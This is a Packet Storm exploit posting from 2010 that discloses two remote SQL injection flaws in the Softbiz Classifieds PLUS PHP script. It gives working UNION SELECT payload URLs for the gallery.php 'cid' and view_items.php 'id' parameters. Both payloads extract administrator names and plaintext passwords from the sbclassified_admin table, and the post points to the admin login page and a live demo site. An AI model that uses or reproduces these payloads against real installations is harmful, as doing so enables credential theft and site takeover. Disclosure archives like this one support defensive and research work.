exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Softbiz Classifieds PLUS SQL Injection

Softbiz Classifieds PLUS SQL Injection
Posted Feb 25, 2010
Authored by Easy Laster

Softbiz Classifieds PLUS suffers from multiple remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, sql injection
SHA-256 | 6637f9df6e7c0380a790cc741bef9937374ec63fb8e821aa365caae0bca84e85

Softbiz Classifieds PLUS SQL Injection

Change Mirror Download
----------------------------Information------------------------------------------------
+Name : Softbiz Classifieds PLUS SQL Injection gallery.php
+Autor : Easy Laster
+Date : 25.02.2010
+Script : Softbiz Classifieds PLUS
+Download : -----
+Demo : www.posbisnis.com /the password is in browser line ^^
+Price : 99$
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Damian.
---------------------------------------------------------------------------------------

___ ___ ___ ___ _ _ _____ _ _
| | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_
|_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _|
|_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_|
|___| |___|


----------------------------------------------------------------------------------------
+Vulnerability : www.site.com/auktionscript/gallery.php?cid=
+Exploitable : www.site.com/auktionscript/gallery.php?cid=111111111+union
+select+1,concat(admin_name,0x39,pwd),3,4,5+from+sbclassified_admin--

The Password save in Plaintext you must login in www.site.com/auktionscript/admin/
-----------------------------------------------------------------------------------------
----------------------------Information------------------------------------------------
+Name : Softbiz Classifieds PLUS SQL Injection view_items.php
+Autor : Easy Laster
+Date : 25.02.2010
+Script : Softbiz Classifieds PLUS
+Download : -----
+Demo : www.posbisnis.com
+Price : 99$
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Damian.
---------------------------------------------------------------------------------------

___ ___ ___ ___ _ _ _____ _ _
| | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_
|_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _|
|_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_|
|___| |___|


----------------------------------------------------------------------------------------
+Vulnerability : www.site.com/auktionscript/view_items.php?id=
+Exploitable : http://www.site.com/auktionscript/view_items.php?id=-null+union+select
+1,2,3,4,5,6,7,8,9,10,concat(admin_name,0x3a,pwd),12,13,14,15,16,17,18,19,20,21,22,23+
from+sbclassified_admin--


The Password save in Plaintext you must login in www.site.com/auktionscript/admin/
-----------------------------------------------------------------------------------------
Login or Register to add favorites

File Archive:

June 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    18 Files
  • 2
    Jun 2nd
    13 Files
  • 3
    Jun 3rd
    0 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    0 Files
  • 7
    Jun 7th
    0 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    0 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close